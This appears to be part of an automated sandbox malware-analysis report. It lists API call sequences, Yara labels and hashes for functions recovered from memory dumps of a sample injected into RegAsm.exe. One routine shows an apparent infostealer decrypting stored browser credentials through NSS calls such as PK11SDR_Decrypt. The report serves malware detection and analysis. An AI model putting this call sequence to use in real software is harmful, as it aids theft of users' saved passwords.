                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Heap$AllocBinaryCryptProcessString
                                                                                    • String ID:
                                                                                    • API String ID: 1871034439-0
                                                                                    • Opcode ID: ad0991718ef18b2bf8ef03264dcc82093b956574455e5d0286dcdbe0f337aa8f
                                                                                    • Instruction ID: 533e96b164cb0d967d7948213eb188af149c3bb85dd902e70f95414ccdf186b2
                                                                                    • Opcode Fuzzy Hash: ad0991718ef18b2bf8ef03264dcc82093b956574455e5d0286dcdbe0f337aa8f
                                                                                    • Instruction Fuzzy Hash: C2016931500209FFDF118FA5EC449EBBBAEFF4A350B104429F90193210D7759C91EB60
                                                                                    APIs
                                                                                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,004058F9,00000000,00000000), ref: 00406262
                                                                                    • LocalAlloc.KERNEL32(00000040,004058F9,?,?,004058F9,00000000,?,?), ref: 00406270
                                                                                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,004058F9,00000000,00000000), ref: 00406286
                                                                                    • LocalFree.KERNEL32(00000000,?,?,004058F9,00000000,?,?), ref: 00406295
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: BinaryCryptLocalString$AllocFree
                                                                                    • String ID:
                                                                                    • API String ID: 4291131564-0
                                                                                    • Opcode ID: 5e238f24b81681bd1e218dc304b4b0d5aee478eb474be9148ccb694fddff89b6
                                                                                    • Instruction ID: 7cbb48460589e96c39e43793b365f6781130aaaa1b7fd363564d70c00da41937
                                                                                    • Opcode Fuzzy Hash: 5e238f24b81681bd1e218dc304b4b0d5aee478eb474be9148ccb694fddff89b6
                                                                                    • Instruction Fuzzy Hash: BD01E874101234BFDB215F56DC88E8B7FB9EF4ABA0B104455FA09A6250D3719910DBB0
                                                                                    APIs
                                                                                    • NtQueryVirtualMemory.NTDLL ref: 6CC9B720
                                                                                    • RtlNtStatusToDosError.NTDLL ref: 6CC9B75A
                                                                                    • RtlSetLastWin32Error.NTDLL(00000000,00000000,000000FF,00000000,00000000,?,0000001C,6CC6FE3F,00000000,00000000,?,?,00000000,?,6CC6FE3F), ref: 6CC9B760
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Error$LastMemoryQueryStatusVirtualWin32
                                                                                    • String ID:
                                                                                    • API String ID: 304294125-0
                                                                                    • Opcode ID: 69602cdc0b1d0e29140f1454348b50086523ef860cf579d2745ad6e8c1d4e294
                                                                                    • Instruction ID: 5d15ee3e7e3c4228bc50bc9e71f681a6e3b29077ee66b0fdb3e494a2e711cfb8
                                                                                    • Opcode Fuzzy Hash: 69602cdc0b1d0e29140f1454348b50086523ef860cf579d2745ad6e8c1d4e294
                                                                                    • Instruction Fuzzy Hash: 7EF0AFB0A0420DBEEF119AE18C98BEEB7BF9B04319F10522AE611A15C0E77495C8C660
                                                                                    APIs
                                                                                    • rand_s.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6CC403D4,?), ref: 6CC9B955
                                                                                    • NtQueryVirtualMemory.NTDLL ref: 6CC9B9A5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: MemoryQueryVirtualrand_s
                                                                                    • String ID:
                                                                                    • API String ID: 1889792194-0
                                                                                    • Opcode ID: 24872ef7b6528955813f740f226f3da6c413d6723b10964234b39344335818ec
                                                                                    • Instruction ID: 66f43680a39ea0dab7724b07b212b6010b9756df0d235ffc1eea50774b211e27
                                                                                    • Opcode Fuzzy Hash: 24872ef7b6528955813f740f226f3da6c413d6723b10964234b39344335818ec
                                                                                    • Instruction Fuzzy Hash: BF41B671F0121DAFDF14CFA9D890ADEB7B5EF88354F14812AE505A7704EB319C458B90
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 0040E304
                                                                                      • Part of subcall function 0040E204: _EH_prolog.MSVCRT ref: 0040E209
                                                                                      • Part of subcall function 0040E204: lstrlenA.KERNEL32(?,6D187FA0,75B65460,00000000), ref: 0040E22D
                                                                                      • Part of subcall function 0040E204: strchr.MSVCRT ref: 0040E23F
                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,6D187FA0,00000000), ref: 0040E353
                                                                                    • HeapAlloc.KERNEL32(00000000,?,6D187FA0,00000000), ref: 0040E35A
                                                                                    • GetProcessHeap.KERNEL32(00000000,?,?,6D187FA0,00000000), ref: 0040E36F
                                                                                    • HeapFree.KERNEL32(00000000,?,6D187FA0,00000000), ref: 0040E376
                                                                                    • strcpy_s.MSVCRT ref: 0040E3AF
                                                                                    • GetProcessHeap.KERNEL32(00000000,?,?,?,75B65460,?,6D187FA0,00000000), ref: 0040E3C6
                                                                                    • HeapFree.KERNEL32(00000000,?,?,75B65460,?,6D187FA0,00000000), ref: 0040E3CD
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,75B65460,?,6D187FA0,00000000), ref: 0040E3F3
                                                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,75B65460,?,6D187FA0,00000000), ref: 0040E3FA
                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,75B65460,?,6D187FA0,00000000), ref: 0040E401
                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,75B65460,?,6D187FA0,00000000), ref: 0040E408
                                                                                    • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,75B65460,?,6D187FA0,00000000), ref: 0040E41D
                                                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,75B65460,?,6D187FA0,00000000), ref: 0040E424
                                                                                    • strcpy_s.MSVCRT ref: 0040E437
                                                                                    • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,75B65460,?,6D187FA0,00000000), ref: 0040E448
                                                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,75B65460,?,6D187FA0,00000000), ref: 0040E44F
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,75B65460,?,6D187FA0), ref: 0040E46A
                                                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,75B65460,?,6D187FA0,00000000), ref: 0040E471
                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,75B65460,?,6D187FA0), ref: 0040E478
                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,75B65460,?,6D187FA0,00000000), ref: 0040E47F
                                                                                    • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,75B65460,?,6D187FA0), ref: 0040E494
                                                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,75B65460,?,6D187FA0,00000000), ref: 0040E49B
                                                                                    • strcpy_s.MSVCRT ref: 0040E4AE
                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 0040E4BF
                                                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,75B65460), ref: 0040E4C6
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,75B65460,?,6D187FA0,00000000), ref: 0040E4E8
                                                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,75B65460,?,6D187FA0,00000000), ref: 0040E4EF
                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,75B65460,?,6D187FA0,00000000), ref: 0040E4F6
                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,75B65460,?,6D187FA0,00000000), ref: 0040E4FD
                                                                                    • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,75B65460,?,6D187FA0,00000000), ref: 0040E515
                                                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,75B65460,?,6D187FA0,00000000), ref: 0040E51C
                                                                                    • strcpy_s.MSVCRT ref: 0040E52F
                                                                                    • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,75B65460,?,6D187FA0,00000000), ref: 0040E540
                                                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,75B65460,?,6D187FA0,00000000), ref: 0040E547
                                                                                      • Part of subcall function 0040E156: strlen.MSVCRT ref: 0040E16D
                                                                                    • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,75B65460,?,6D187FA0,00000000), ref: 0040E550
                                                                                    • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,?,?,?,?,75B65460,?,6D187FA0,00000000), ref: 0040E560
                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,75B65460,?,6D187FA0,00000000), ref: 0040E567
                                                                                    • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,75B65460,?,6D187FA0,00000000), ref: 0040E593
                                                                                    • strcpy_s.MSVCRT ref: 0040E5B7
                                                                                    • GetProcessHeap.KERNEL32(00000000,?,00000001,00000000,00000001,00000000,?,?,00000000), ref: 0040E5E0
                                                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,75B65460,?,6D187FA0,00000000), ref: 0040E5E7
                                                                                    • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,75B65460,?,6D187FA0,00000000), ref: 0040E5EC
                                                                                    • GetProcessHeap.KERNEL32(00000008,00000001,?,?,?,?,?,?,?,?,75B65460,?,6D187FA0,00000000), ref: 0040E5F7
                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,75B65460,?,6D187FA0,00000000), ref: 0040E5FE
                                                                                    • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,75B65460,?,6D187FA0,00000000), ref: 0040E60F
                                                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,75B65460,?,6D187FA0,00000000), ref: 0040E616
                                                                                    • strcpy_s.MSVCRT ref: 0040E624
                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 0040E630
                                                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,75B65460), ref: 0040E637
                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 0040E65D
                                                                                    • HeapFree.KERNEL32(00000000), ref: 0040E664
                                                                                    • GetProcessHeap.KERNEL32(00000008,00000010), ref: 0040E66B
                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0040E672
                                                                                    • strcpy_s.MSVCRT ref: 0040E68A
                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 0040E69B
                                                                                    • HeapFree.KERNEL32(00000000), ref: 0040E6A2
                                                                                    • strlen.MSVCRT ref: 0040E6F0
                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 0040E734
                                                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,75B65460), ref: 0040E73B
                                                                                      • Part of subcall function 0040E204: strchr.MSVCRT ref: 0040E263
                                                                                      • Part of subcall function 0040E204: lstrlenA.KERNEL32(?), ref: 0040E281
                                                                                      • Part of subcall function 0040E204: GetProcessHeap.KERNEL32(00000008,-00000001), ref: 0040E28E
                                                                                      • Part of subcall function 0040E204: HeapAlloc.KERNEL32(00000000), ref: 0040E295
                                                                                      • Part of subcall function 0040E204: strcpy_s.MSVCRT ref: 0040E2D0
                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 0040E787
                                                                                    • HeapFree.KERNEL32(00000000), ref: 0040E78E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Heap$Process$Free$Allocstrcpy_s$lstrlen$H_prologstrchrstrlen
                                                                                    • String ID:
                                                                                    • API String ID: 2599614518-0
                                                                                    • Opcode ID: bc8bb12e550e9466988ecdd805507d8dd5a8f3e6430f6d689f4abeca2a9266a5
                                                                                    • Instruction ID: 55f0d82739dd95474ff7fe735f77d6d86875030ea8a2a65347861b983bd56a5d
                                                                                    • Opcode Fuzzy Hash: bc8bb12e550e9466988ecdd805507d8dd5a8f3e6430f6d689f4abeca2a9266a5
                                                                                    • Instruction Fuzzy Hash: D2E13AB1C0021AAFDF10AFE1DD49AAFBB79FF08304F10082AF615B2191DB794954DB65
                                                                                    APIs
                                                                                    • LoadLibraryW.KERNEL32(user32,?,6CC6E1A5), ref: 6CC95606
                                                                                    • LoadLibraryW.KERNEL32(gdi32,?,6CC6E1A5), ref: 6CC9560F
                                                                                    • GetProcAddress.KERNEL32(00000000,GetThreadDpiAwarenessContext), ref: 6CC95633
                                                                                    • GetProcAddress.KERNEL32(00000000,AreDpiAwarenessContextsEqual), ref: 6CC9563D
                                                                                    • GetProcAddress.KERNEL32(00000000,EnableNonClientDpiScaling), ref: 6CC9566C
                                                                                    • GetProcAddress.KERNEL32(00000000,GetSystemMetricsForDpi), ref: 6CC9567D
                                                                                    • GetProcAddress.KERNEL32(00000000,GetDpiForWindow), ref: 6CC95696
                                                                                    • GetProcAddress.KERNEL32(00000000,RegisterClassW), ref: 6CC956B2
                                                                                    • GetProcAddress.KERNEL32(00000000,CreateWindowExW), ref: 6CC956CB
                                                                                    • GetProcAddress.KERNEL32(00000000,ShowWindow), ref: 6CC956E4
                                                                                    • GetProcAddress.KERNEL32(00000000,SetWindowPos), ref: 6CC956FD
                                                                                    • GetProcAddress.KERNEL32(00000000,GetWindowDC), ref: 6CC95716
                                                                                    • GetProcAddress.KERNEL32(00000000,FillRect), ref: 6CC9572F
                                                                                    • GetProcAddress.KERNEL32(00000000,ReleaseDC), ref: 6CC95748
                                                                                    • GetProcAddress.KERNEL32(00000000,LoadIconW), ref: 6CC95761
                                                                                    • GetProcAddress.KERNEL32(00000000,LoadCursorW), ref: 6CC9577A
                                                                                    • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 6CC95793
                                                                                    • GetProcAddress.KERNEL32(00000000,GetMonitorInfoW), ref: 6CC957A8
                                                                                    • GetProcAddress.KERNEL32(00000000,SetWindowLongPtrW), ref: 6CC957BD
                                                                                    • GetProcAddress.KERNEL32(?,StretchDIBits), ref: 6CC957D5
                                                                                    • GetProcAddress.KERNEL32(?,CreateSolidBrush), ref: 6CC957EA
                                                                                    • GetProcAddress.KERNEL32(?,DeleteObject), ref: 6CC957FF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressProc$LibraryLoad
                                                                                    • String ID: AreDpiAwarenessContextsEqual$CreateSolidBrush$CreateWindowExW$DeleteObject$EnableNonClientDpiScaling$FillRect$GetDpiForWindow$GetMonitorInfoW$GetSystemMetricsForDpi$GetThreadDpiAwarenessContext$GetWindowDC$LoadCursorW$LoadIconW$MonitorFromWindow$RegisterClassW$ReleaseDC$SetWindowLongPtrW$SetWindowPos$ShowWindow$StretchDIBits$gdi32$user32
                                                                                    • API String ID: 2238633743-1964193996
                                                                                    • Opcode ID: 3394951234287e73555ebd44b89cf3b322af3ca4bf4ec0db362da85cab6028ff
                                                                                    • Instruction ID: 60e0a58a143f38bf0554afb9d3c851d7e7888783ac5399ff866542497ea2477e
                                                                                    • Opcode Fuzzy Hash: 3394951234287e73555ebd44b89cf3b322af3ca4bf4ec0db362da85cab6028ff
                                                                                    • Instruction Fuzzy Hash: C75156787117436FDB019FF98E989263AF8AB062467104525F912E2B52FB70CD01CF78
                                                                                    APIs
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,default,?,6CC4582D), ref: 6CC7CC27
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,java,?,?,?,6CC4582D), ref: 6CC7CC3D
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,6CCAFE98,?,?,?,?,?,6CC4582D), ref: 6CC7CC56
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,leaf,?,?,?,?,?,?,?,6CC4582D), ref: 6CC7CC6C
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,mainthreadio,?,?,?,?,?,?,?,?,?,6CC4582D), ref: 6CC7CC82
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileio,?,?,?,?,?,?,?,?,?,?,?,6CC4582D), ref: 6CC7CC98
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileioall,?,?,?,?,?,?,?,?,?,?,?,?,?,6CC4582D), ref: 6CC7CCAE
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,noiostacks), ref: 6CC7CCC4
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,screenshots), ref: 6CC7CCDA
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,seqstyle), ref: 6CC7CCEC
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,stackwalk), ref: 6CC7CCFE
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,jsallocations), ref: 6CC7CD14
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nostacksampling), ref: 6CC7CD82
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,preferencereads), ref: 6CC7CD98
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nativeallocations), ref: 6CC7CDAE
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ipcmessages), ref: 6CC7CDC4
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,audiocallbacktracing), ref: 6CC7CDDA
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpu), ref: 6CC7CDF0
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,notimerresolutionchange), ref: 6CC7CE06
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpuallthreads), ref: 6CC7CE1C
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,samplingallthreads), ref: 6CC7CE32
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,markersallthreads), ref: 6CC7CE48
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,unregisteredthreads), ref: 6CC7CE5E
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,processcpu), ref: 6CC7CE74
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,power), ref: 6CC7CE8A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: strcmp
                                                                                    • String ID: Unrecognized feature "%s".$audiocallbacktracing$cpuallthreads$default$fileio$fileioall$ipcmessages$java$jsallocations$leaf$mainthreadio$markersallthreads$nativeallocations$noiostacks$nostacksampling$notimerresolutionchange$power$preferencereads$processcpu$samplingallthreads$screenshots$seqstyle$stackwalk$unregisteredthreads
                                                                                    • API String ID: 1004003707-2809817890
                                                                                    • Opcode ID: 774738c5f8732272e01d692e99011a24cc8c73497f340e28a2a4dc9d6857460c
                                                                                    • Instruction ID: adbd82381bcde73db592a30a0d374516a24e326067855386c7318992915e659b
                                                                                    • Opcode Fuzzy Hash: 774738c5f8732272e01d692e99011a24cc8c73497f340e28a2a4dc9d6857460c
                                                                                    • Instruction Fuzzy Hash: BE51DDD190662712FE2031966F14BEA2488FF6335AF108076ED19B1F80FF15D60B86B7
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 004083E1
                                                                                    • NSS_Init.NSS3(00000000,?,00000000,?), ref: 004083FE
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 004084E1
                                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 004084E9
                                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 004084F5
                                                                                    • ??_U@YAPAXI@Z.MSVCRT ref: 004084FF
                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00408510
                                                                                    • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0040851C
                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00408523
                                                                                    • StrStrA.SHLWAPI(?), ref: 00408535
                                                                                    • StrStrA.SHLWAPI(-00000010), ref: 0040854F
                                                                                    • lstrcat.KERNEL32(00000000), ref: 00408563
                                                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00408575
                                                                                    • lstrcat.KERNEL32(00000000,00425D48), ref: 00408583
                                                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00408595
                                                                                    • lstrcat.KERNEL32(00000000,00425D4C), ref: 004085A3
                                                                                    • lstrcat.KERNEL32(00000000), ref: 004085B2
                                                                                    • lstrcat.KERNEL32(00000000,-00000010), ref: 004085BC
                                                                                    • lstrcat.KERNEL32(00000000,00425D50), ref: 004085CA
                                                                                    • StrStrA.SHLWAPI(-000000FE), ref: 004085DA
                                                                                    • StrStrA.SHLWAPI(00000014), ref: 004085EA
                                                                                    • lstrcat.KERNEL32(00000000), ref: 004085FE
                                                                                      • Part of subcall function 004082DE: memset.MSVCRT ref: 00408305
                                                                                      • Part of subcall function 004082DE: lstrlenA.KERNEL32(0040860A,00000001,?,00000014,00000000,00000000,?,0040860A,00000014), ref: 0040831F
                                                                                      • Part of subcall function 004082DE: CryptStringToBinaryA.CRYPT32(0040860A,00000000,?,0040860A,00000014), ref: 00408329
                                                                                      • Part of subcall function 004082DE: PK11_GetInternalKeySlot.NSS3(?,0040860A,00000014), ref: 00408337
                                                                                      • Part of subcall function 004082DE: PK11_Authenticate.NSS3(00000000,00000001,00000000,?,0040860A,00000014), ref: 0040834C
                                                                                      • Part of subcall function 004082DE: PK11SDR_Decrypt.NSS3(?,?,00000000), ref: 00408377
                                                                                      • Part of subcall function 004082DE: memcpy.MSVCRT ref: 00408391
                                                                                      • Part of subcall function 004082DE: PK11_FreeSlot.NSS3(?), ref: 004083C1
                                                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 0040860F
                                                                                    • lstrcat.KERNEL32(00000000,00425D54), ref: 0040861D
                                                                                    • StrStrA.SHLWAPI(-000000FE), ref: 0040862D
                                                                                    • StrStrA.SHLWAPI(00000014), ref: 0040863D
                                                                                    • lstrcat.KERNEL32(00000000), ref: 00408651
                                                                                      • Part of subcall function 004082DE: lstrcat.KERNEL32(00425B87,00425B8B), ref: 004083B8
                                                                                      • Part of subcall function 004082DE: lstrcat.KERNEL32(00425B87,00425B8E), ref: 004083D0
                                                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00408662
                                                                                    • lstrcat.KERNEL32(00000000,00425D58), ref: 00408670
                                                                                    • lstrcat.KERNEL32(00000000,00425D5C), ref: 0040867E
                                                                                    • StrStrA.SHLWAPI(-000000FE), ref: 0040868E
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 004086A4
                                                                                    • memset.MSVCRT ref: 004086F7
